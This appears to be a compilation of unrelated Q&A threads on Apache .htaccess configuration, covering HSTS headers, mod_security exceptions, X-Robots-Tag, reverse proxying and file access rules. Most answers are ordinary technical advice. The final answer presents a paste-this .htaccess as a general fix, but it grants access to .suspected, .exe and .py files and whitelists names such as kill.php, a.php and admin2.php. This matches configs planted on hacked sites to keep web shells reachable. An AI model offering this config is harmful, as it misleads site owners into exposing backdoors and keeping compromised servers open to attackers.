I want to always use https:// and www URLs. So I used the following code in my .htaccess file, but I am getting a warning from https://hstspreload.org.
RewriteEngine On

# Redirect HTTP to HTTPS
RewriteCond %{HTTPS} off
RewriteRule .* https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# Redirect non-www to www
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule .* https://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

<IfModule mod_headers.c>
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
</IfModule>
The warning message is given below:
Warning: Unnecessary HSTS header over HTTP
The HTTP page at http://mysiteurl.com sends an HSTS header. This has no effect over HTTP, and should be removed.
Please help me get rid of the above warning. I also tried the following code, but it does not work:
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS
Try removing the always attribute. So do this:
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS
Instead of this:
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS
The other option is to only set this in the HTTPS VirtualHosts, rather than in the main top-level config:
Do this:
<VirtualHost *:443>
(All other virtual host config)
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
</VirtualHost>
Instead of this:
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
<VirtualHost *:443>
(All other virtual host config)
</VirtualHost>
This has the disadvantage (or advantage depending how you look at it!) of having to be added to each VirtualHost to take effect, whereas the first option would automatically be applied to all HTTPS virtual hosts.
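On Apache 2.4.10 and later there is a third option, which is not from the original answer: mod_headers accepts an expression as the condition, so a single directive in the main config can fire only on TLS connections. A minimal sketch:
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" "expr=%{HTTPS} == 'on'"
This behaves like the per-VirtualHost option, but lives in one place.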
And please, please, please be very careful with preload. It is not easily reversible! I would strongly recommend you run for a few months with a good (i.e. error-free) config - which it appears you have not been doing - before submitting to the preload list.
To give one example where preload can cause you problems: suppose you run https://www.example.com, and this also responds to http://example.com and redirects to https://example.com and then to https://www.example.com (as the preload submission requires and as your config is set up to do). Then your website is lovely and secure.

However, for companies that reuse their domain internally (which is quite common) this can cause problems - especially when you preload. For example, if you run a non-secure site which is not publicly available at http://intranet.example.com, or perhaps a non-secure development version of your site at http://dev.example.com, then you may not realise that those sites must now also be served over HTTPS (as they are subdomains of example.com).

This rarely takes effect in normal use (most people don't visit http://example.com or https://example.com directly, so they never see the HSTS header on the top-level domain), so you might never notice this potential problem during all your testing. However, as soon as the preload takes effect, the browser knows about the HSTS policy on the top-level domain even without visiting it, and you instantly lose access to those HTTP-only sites - and cannot easily reverse this! Lots of companies still have lots of internal sites and tools served over HTTP only, and upgrading them all to HTTPS (which should be done anyway, btw!) at short notice would not be easy.
To get around this, either use a different domain internally, or set HSTS without includeSubDomains on the top-level domain:
<VirtualHost *:443>
ServerName example.com
(All other virtual host config)
#Set HSTS at top level without includeSubDomains
Header always set Strict-Transport-Security "max-age=31536000"
</VirtualHost>
<VirtualHost *:443>
ServerName www.example.com
(All other virtual host config)
#Set HSTS at subdomain level
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
</VirtualHost>
This is not quite as secure (someone could set up other subdomains over HTTP, like http://wwww.example.com (note the four Ws) or http://fake.example.com), but at least it doesn't break those HTTP-only sites. Note that this setup will not be accepted onto the preload list, which demands the more secure includeSubDomains even on the top-level domain.
If you do want to use includeSubDomains on the top-level domain, then I strongly recommend including a resource from the top-level domain in your HTML (even if it redirects to the www version - HSTS is still set on 301/302 responses). This way you make sure visitors pick up the HSTS config for the top-level domain even before you preload. For example, you could load your logo from the top-level domain instead:
<img src="https://example.com/logo.png">
Run with that, a small expiry, and no preload tag for a bit. Then increase the expiry. Then, if that all works, add the preload tag back and submit to the preload list.
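To make that staged rollout concrete (the values are illustrative, not from the original answer), the directive could be ramped up in three stages, uncommenting the next stage as confidence grows:
# Stage 1: short expiry, no preload, while verifying the config
Header always set Strict-Transport-Security "max-age=300; includeSubDomains" env=HTTPS
# Stage 2 (after a few error-free weeks): long expiry
#Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains" env=HTTPS
# Stage 3: add preload, then submit to hstspreload.org
#Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS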
This might all sound a bit painful, and perhaps you've thought of all this, but preloading can be incredibly dangerous if not thought through, because it is not easily reversible. In my opinion, preloading HSTS is overkill for most sites, though I agree it is the most secure option.
I solved the error on my LiteSpeed-based server with this method; it also works for Apache. First, add this code to your .htaccess:
# Force HTTPS
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
Then add this code:
<IfModule mod_headers.c>
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" env=HTTPS
</IfModule>
Ubuntu 18.04, Apache2, Let's Encrypt:
nano /etc/apache2/conf-enabled/ssl-params.conf
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" env=HTTPS
service apache2 restart
Then remove or comment out (#) the same directive in every other vhost conf referenced from apache.conf:
#Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" env=HTTPS
The issue is you are sending the header even when the user is connected over HTTP.
If you want to force them to use HTTPS, perform a redirect first, like this:
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
My payment gateway is blocked by mod_security when trying to access a WooCommerce endpoint.
I'm receiving a 403 Permission Denied when trying to access the "/wc-api/my_gateway_payment_callback" endpoint.
I'm on a LiteSpeed shared host.
When I disable mod_security from .htaccess:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
it solves the issue but exposes the WordPress admin to attacks, so I want to be more specific.
I tried adding a LocationMatch:
<LocationMatch "/wc-api/my_gateway_payment_callback">
<IfModule mod_security.c>
SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
</IfModule>
</LocationMatch>
or
<IfModule mod_security.c>
SecRule REQUEST_URI "@beginsWith /my_gateway_payment_callback" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
</IfModule>
but they don't work and I'm still getting the 403 error.
I can spot multiple problems here:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Are you really using ModSecurity v1? That is VERY old and suggests you are also on Apache 1.x, as ModSecurity v1 is not compatible with Apache 2. If not, this should be:
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
Next you say:
it solves the issue but exposes the WordPress admin to attacks
I don't see how it can solve the issue unless you are on REALLY old software, so I suspect this is a red herring.
so I want to be more specific. I tried to add a LocationMatch
Good idea to be more specific. However, LocationMatch runs quite late in the Apache process - after the ModSecurity rules have run - so this will not work. You don't really need LocationMatch anyway, since your rule already scopes itself to that location. So let's look at the next two pieces:
SecRule REQUEST_URI "@beginsWith /wc-api/my_gateway_payment_callback/" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
SecRuleRemoveById 3000
You shouldn't need to remove the rule if you allow it on the previous lines. Typically you would only do one or the other.
or
<IfModule mod_security.c>
SecRule REQUEST_URI "@beginsWith /my_gateway_payment_callback" \
    "phase:2,id:1000,nolog,pass,allow,msg:'Update URI accessed'"
</IfModule>
but they don't work and I'm still getting the 403 error.
You have pass (which means continue on to the next rule) and allow (which means skip all future rules). It seems to me you only want the latter, not the former. As these conflict, I suspect ModSecurity actions the former first, which is why it is not working.
However, the better way is to look at the Apache error logs to see which rule it is failing on (is it rule 3000, as per your other LocationMatch workaround?) and disable just that one rule, rather than disabling all rules for that route.
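For example, if the error logs showed the 403 coming from rule 3000 (that id is only an assumption here), the usual pattern is to remove just that rule for just that endpoint. Unlike phased SecRules, SecRuleRemoveById is applied when the configuration is merged, so it does work inside LocationMatch - though LocationMatch itself is only valid in the server config, not in .htaccess:
<LocationMatch "^/wc-api/my_gateway_payment_callback">
<IfModule mod_security2.c>
# Disable only the offending rule for this endpoint
SecRuleRemoveById 3000
</IfModule>
</LocationMatch>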
So, all in all, I'm pretty confused by your question, as there seem to be a lot of inconsistencies and things that are just wrong in there...
I'm trying to set the HSTS header in .htaccess based on the kind of request (HTTPS or HTTP). I tried to adapt this piece of code, which sets a Cache-Control "max-age=300" header on image files by checking an environment variable:
RewriteRule \.(png|gif|jpg) - [E=image:1]
Header set Cache-Control "max-age=300" env=image
This way:
RewriteCond %{HTTPS} on
RewriteRule ^ - [E=STRICT_ENV:1]
Header always set Strict-Transport-Security "max-age=63072000;" env=STRICT_ENV
But it seems that the STRICT_ENV variable is not set at all.
Give this header a try; on most setups mod_ssl sets the HTTPS variable for you on TLS connections:
Header set Strict-Transport-Security "max-age=63072000" env=HTTPS
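If you would rather keep the mod_rewrite approach, the likely reason STRICT_ENV never appears is that a per-directory (.htaccess) rewrite triggers an internal redirect, after which variables set with [E=...] only survive with a REDIRECT_ prefix. A sketch that checks both names (based on that behaviour; untested on your setup):
RewriteCond %{HTTPS} on
RewriteRule ^ - [E=STRICT_ENV:1]
# After the internal rewrite round the variable may only exist as REDIRECT_STRICT_ENV
Header always set Strict-Transport-Security "max-age=63072000" env=STRICT_ENV
Header always set Strict-Transport-Security "max-age=63072000" env=REDIRECT_STRICT_ENV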
Can I 'noindex, follow' a specific page using x robots in .htaccess?
I've found some instructions for noindexing types of files, but I can't find instructions to noindex a single page, and what I have tried so far hasn't worked.
This is the page I'm looking to noindex:
http://www.examplesite.com.au/index.php?route=news/headlines
This is what I have tried so far:
<FilesMatch "/index.php?route=news/headlines$">
Header set X-Robots-Tag "noindex, follow"
</FilesMatch>
Thanks for your time.
It seems to be impossible to match the request parameters (the query string) from within a container section in a .htaccess file. Here is a list of what you can match against: http://httpd.apache.org/docs/2.2/sections.html
It will be much easier to do this in your script. If you are running PHP, try:
header('X-Robots-Tag: noindex, follow');
You can easily build conditions on $_GET, REQUEST_URI and so on.
RewriteEngine on
RewriteBase /
#set env variable if url matches
RewriteCond %{QUERY_STRING} ^route=news/headlines$
RewriteRule ^index\.php$ - [env=NOINDEXFOLLOW:true]
#only sent header if env variable set
Header set X-Robots-Tag "noindex, follow" env=NOINDEXFOLLOW
FilesMatch works on (local) files, not URLs, so it would try to match only the /index.php part of the URL. <Location> would be more appropriate, but as far as I can tell from the documentation, query strings are not allowed there either. So I ended up with the solution above (I really liked this challenge). PHP would be the more obvious place to put this, but that is up to you.
The solution requires mod_rewrite, and mod_headers of course.
Note that you'll need the mod_headers module enabled to set the headers.
Though, like others have said, it seems better to use the PHP header() call. Does that not work?
According to Google the syntax would be a little different:
<Files ~ "\.pdf$">
Header set X-Robots-Tag "noindex, nofollow"
</Files>
https://developers.google.com/webmasters/control-crawl-index/docs/robots_meta_tag
I would like to change the link "http://blog.test.com/" to "http://www.test.com/blog/".
I've tried the following code in my .htaccess
RewriteRule ^blog.test.com?$ test.com/blog [NC,R=301,L]
Did I miss anything? Thanks
If you're using Apache, you need to match the host part of the URL (e.g. blog.test.com) in a RewriteCond:
RewriteCond %{HTTP_HOST} ^blog\.test\.com$ [NC]
RewriteRule ^(.*)$ http://www.test.com/blog/$1 [R=301,L]
First of all, you should replace http://blog.test.com/whatever_or_empty with http://www.test.com/blog/whatever_or_empty in your HTML hrefs.
blog.test.com, although a subdomain, is a different host. When a RewriteRule rewrites to another host, an external redirect occurs, and it shows up in the browser - whether as a temporary redirect (302, the default) or a permanent redirect (301). So using URL rewriting alone to make http://blog.test.com/ appear as http://www.test.com/blog/ is useless.
You can, however, achieve this using the Apache module mod_proxy.
The Apache proxy modules are:
mod_proxy: The core module deals with proxy infrastructure and configuration and managing a proxy request.
mod_proxy_http: This handles fetching documents with HTTP and HTTPS.
mod_proxy_ftp: This handles fetching documents with FTP.
mod_proxy_connect: This handles the CONNECT method for secure (SSL) tunneling.
mod_proxy_ajp: This handles the AJP protocol for Tomcat and similar backend servers.
mod_proxy_balancer implements clustering and load-balancing over multiple backends.
mod_cache, mod_disk_cache, mod_mem_cache: These deal with managing a document cache. To enable caching requires mod_cache and one or both of disk_cache and mem_cache.
mod_proxy_html: This rewrites HTML links into a proxy's address space.
mod_xml2enc: This supports internationalisation (i18n) on behalf of mod_proxy_html and other markup-filtering modules.
mod_headers: This modifies HTTP request and response headers.
mod_deflate: Negotiates compression with clients and backends.
You need at least the mod_proxy and mod_proxy_http modules enabled for the proxy to work. You should have lines similar to these in your Apache conf file:
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_module modules/mod_proxy.so
Use this in the VirtualHost of http://www.test.com:
ProxyPass /blog http://blog.test.com
ProxyPassReverse /blog http://blog.test.com
# Forward proxying must stay off for a reverse proxy, or you create an open proxy
ProxyRequests Off
ProxyVia On
<Proxy *>
Order allow,deny
Allow from all
</Proxy>
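Note that Order/Allow is Apache 2.2 syntax; on Apache 2.4 the equivalent access control for the proxy section would be this (a sketch, not from the original answer):
<Proxy "*">
Require all granted
</Proxy>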
Definitions:
ProxyPass Apache Docs.
ProxyPassReverse Apache Docs.
ProxyRequests Apache Docs.
ProxyVia Apache Docs.
You can also use a cache with mod_cache. For more on caching, refer to the mod_cache Apache Docs.
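As a minimal illustration (the module and directive names are real, the cache path is an assumption), disk caching for the proxied blog on Apache 2.4 - where mod_disk_cache became mod_cache_disk - could look like:
LoadModule cache_module modules/mod_cache.so
LoadModule cache_disk_module modules/mod_cache_disk.so
# Cache proxied /blog responses on disk
CacheRoot "/var/cache/apache2"
CacheEnable disk /blog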
I saw several .htaccess examples that disable access to some files:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
For example, this prevents access to all .js and .sql files; everything else is allowed. I want the opposite! I want those files to be ENABLED and all others prevented. How can I achieve this?
Vorapsak's answer is almost correct. It's actually:
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is that it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
And a bit of explanation:
The order clause tells the server its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaluated: if a request matches any deny directive, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives; if a request matches, it's marked to be denied. Then the "allow" directives are evaluated: if a request matches an allow directive, it's allowed in, even if it matched a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
Oh, and one more thing: directives in a section (i.e. <Files> and <Directory>) are always evaluated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as intended: the main .htaccess body denied the request, then the <Files> order was processed and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
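For completeness: on Apache 2.4, where Order/Allow/Deny are deprecated in favour of Require, the same allow-only-these-files pattern would look like this (a sketch under that assumption; Require in .htaccess needs AllowOverride AuthConfig):
# Deny everything by default...
Require all denied
# ...then allow only .js and .sql files
<Files ~ "\.(js|sql)$">
Require all granted
</Files>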
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
If you are having trouble with your website, use this .htaccess code. It solves most errors you are likely to encounter:
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this helped you, don't forget to give it a thumbs up!